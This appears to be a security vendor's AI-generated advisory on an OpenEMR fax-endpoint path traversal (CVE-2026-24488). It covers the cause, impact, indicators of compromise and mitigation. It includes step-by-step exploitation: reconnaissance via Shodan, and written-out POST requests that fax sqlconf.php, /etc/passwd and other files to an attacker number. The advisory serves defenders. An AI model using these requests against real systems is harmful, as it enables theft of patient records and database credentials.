CVE-2026-24488: 
OpenEMR vulnerability analysis and mitigation

Overview

CVE-2026-24488 is an arbitrary file exfiltration vulnerability in OpenEMR's fax sending endpoint, classified as a Path Traversal flaw (CWE-22). It affects OpenEMR versions up to and including 8.0.0, allowing any authenticated user to read and transmit any server-side file — including database credentials, patient documents, system files, and source code — via fax to an attacker-controlled phone number. The vulnerability was published on February 27, 2026, with a CVSS v3.1 base score of 6.5 (Medium) (GitHub Advisory, Red Hat CVE).

Technical details

The root cause is improper path validation in the sendFax() method of EtherFaxActions.php (lines 177–221). The endpoint accepts a user-controlled file parameter, strips the file:// prefix if present, and calls realpath() to normalize the path — but realpath() only resolves symbolic links and normalizes the path without restricting access to any specific directory. The normalized path is then streamed directly to the EtherFax gateway API without any authorization check or directory boundary enforcement, effectively bypassing OpenEMR's document access control system. An attacker with a valid session and access to the Fax/SMS module can supply any absolute file path readable by the web server process (GitHub Advisory, Patch Reference).

Impact

An authenticated attacker can exfiltrate any file readable by the web server user, including database credentials (sqlconf.php), patient health records (PHI/PII), system files such as /etc/passwd, PHP session files, and application source code. Because database credentials can be obtained, successful exploitation may enable further lateral movement including direct database access, privilege escalation, or full system compromise. The confidentiality impact is high, with no integrity or availability impact from this specific vulnerability alone (GitHub Advisory).

Exploitability

A proof-of-concept (PoC) exploit is publicly available via the GitHub Security Advisory, demonstrating exploitation via a simple HTTP POST request. As of the time of publication, there is no evidence of active in-the-wild exploitation. The EPSS score is approximately 0.04%, indicating low but non-zero probability of exploitation in the near term. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires valid credentials and the Fax/SMS module to be enabled, but no elevated privileges beyond a standard authenticated user are needed (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing OpenEMR instances running versions ≤ 8.0.0 using tools like Shodan or Censys, searching for OpenEMR login pages. Confirm the Fax/SMS module (EtherFax) is enabled by checking for the module endpoint.
  2. Authentication: Log in to the OpenEMR instance using any valid user credentials (no elevated privileges required).
  3. Craft malicious POST request: Send a POST request to the fax endpoint with an arbitrary file path in the file parameter and an attacker-controlled fax number in the phone parameter:
POST /interface/modules/custom_modules/oe-module-faxsms/sendFax?type=fax HTTP/1.1
Host: target-openemr.com
Content-Type: application/x-www-form-urlencoded
Cookie: OpenEMR=<valid_session>

file=/var/www/openemr/sites/default/sqlconf.php&phone=+15551234567
  1. Exfiltrate additional files: Repeat with other target paths to retrieve patient records, system files, or session data:
file=/etc/passwd&phone=+15551234567
file=/var/www/openemr/interface/globals.php&phone=+15551234567
  1. Receive exfiltrated data: The file contents are transmitted via fax to the attacker's phone number through the EtherFax gateway, delivering sensitive data out-of-band (GitHub Advisory).

Indicators of compromise

  • Network: Unusual or repeated POST requests to /interface/modules/custom_modules/oe-module-faxsms/sendFax?type=fax with file parameters containing absolute paths (e.g., /etc/, /var/www/, /var/lib/php/sessions/) rather than expected document references; outbound fax API calls to EtherFax gateway with unexpected file content.
  • Logs: Web server access logs showing POST requests to the fax endpoint with file= values pointing to system or configuration files; application logs recording fax transmissions to unfamiliar or external phone numbers not associated with known patients or facilities.
  • File System: No direct file system artifacts are created by this vulnerability, but review of fax transmission logs in the oe_faxsms_queue database table may reveal entries with unusual filenames or paths.
  • Database: Entries in the oe_faxsms_queue table with called_number values not matching known organizational fax recipients, or details_json referencing system file paths (GitHub Advisory).

Mitigation and workarounds

A patched version of the vulnerable code is available in the OpenEMR repository at the v7_0_4 branch, which implements proper path restriction and authorization checks in the sendFax() method. Organizations should upgrade to a patched release as soon as one is officially published. As interim mitigations: disable or restrict access to the Fax/SMS (EtherFax) module for non-essential users; implement network-level controls to limit access to the fax endpoint; and monitor fax transmission logs for anomalous activity. Additionally, enforce the principle of least privilege for OpenEMR user accounts (GitHub Advisory, Patch Reference).

Community reactions

The vulnerability was reported by researchers simecek, pavelkohout396, and stanislavfortaisle (affiliated with Aisle), who also disclosed 38 critical security vulnerabilities in healthcare software used by 100,000 providers, as noted in a blog post from Aisle. The advisory was published by OpenEMR maintainer bradymiller on GitHub. No significant broader media coverage or notable social media commentary beyond standard CVE tracking feeds has been identified at this time (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related OpenEMR vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-40506HIGH7
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 17, 2026
CVE-2026-76614MEDIUM5.3
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026
CVE-2026-40509MEDIUM5.3
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026
CVE-2026-40508MEDIUM5.1
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026
CVE-2026-40507MEDIUM5.1
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management